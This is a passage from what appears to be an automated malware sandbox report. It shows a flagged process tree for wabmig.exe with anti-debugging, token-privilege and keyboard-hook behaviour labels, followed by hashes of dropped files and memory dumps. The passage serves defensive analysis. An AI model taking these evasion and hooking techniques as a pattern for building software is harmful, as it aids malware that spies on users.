              PID:1804
            • C:\Program Files (x86)\windows mail\wabmig.exe
              "C:\Program Files (x86)\windows mail\wabmig.exe"
              5⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:2664

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      2502ae0125b3187df34e21799e4a554d

      SHA1

      42f7bf983855f179e376eea71c030dce4a8db6ef

      SHA256

      a676b0e3c77f2a66aaa7c82f7fa459194c93b4014bab28a5d0a34eeac2cb6cd1

      SHA512

      ebd6cd2d101f123c0dbdb3b6cd9365f8fd2bbcbfc6fab202237d7d2ca64207a30ee45d9adf2616a264d2a6d9d6c4a551984e702abe0c32c4b2514f3af831b133

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\CabAA07.tmp
      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Tar510E.tmp
      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WDZO5L6I1SR5EW5MBKJN.temp
      Filesize

      7KB

      MD5

      4c6034b736e808f283a28fec6286e7e8

      SHA1

      65e90161edaa8364550c94b6b4a15946c079f443

      SHA256

      888186728a7250e59a52c2a7f47b1e6878eb3b3f1e9e3dd9df5dd16c6ae0e26a

      SHA512

      89eafa5b7557cdf443829046b2cffddad9a2e4fce047d332230f3fee731aa3fefc4e7fc3c8877f5d982dadb6059b9f79cc10d222869b76946249c5770ea83287

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Stolemageren.Luf
      Filesize

      429KB

      MD5

      15285d1ef42d2609ce036a7b7e62b7a1

      SHA1

      e4e92b85d56fb8bfbe43a673cc0939acce3206c6

      SHA256

      16c35e14f7968873511443a4302ca4843e40ca99f5d61e3bf392fa34ead6c24d

      SHA512

      159333da6a60dd9eb7c18e96b7abaf59e3e8608e59e4e4f7c9b5dbe7d09feb92799d6f58a0be047e6f96265bbfbf8ba3750cca6aaa806f940cd7f0b9417e7f64

      Download Submit

    • memory/2256-29-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2256-22-0x0000000002760000-0x0000000002768000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2256-26-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2256-27-0x000007FEF561E000-0x000007FEF561F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2256-28-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2256-25-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2256-31-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2256-32-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2256-21-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2256-24-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2256-65-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2256-20-0x000007FEF561E000-0x000007FEF561F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2256-23-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2664-40-0x00000000003F0000-0x0000000001452000-memory.dmp

      Filesize

      16.4MB

      Download

    • memory/2664-38-0x0000000001460000-0x0000000006B17000-memory.dmp

      Filesize

      86.7MB

      Download

    • memory/2664-64-0x00000000003F0000-0x0000000001452000-memory.dmp

      Filesize

      16.4MB

      Download

    • memory/2664-66-0x00000000003F0000-0x0000000000430000-memory.dmp

      Filesize

      256KB

      Download

    • memory/2724-37-0x0000000006680000-0x000000000BD37000-memory.dmp

      Filesize

      86.7MB

      Download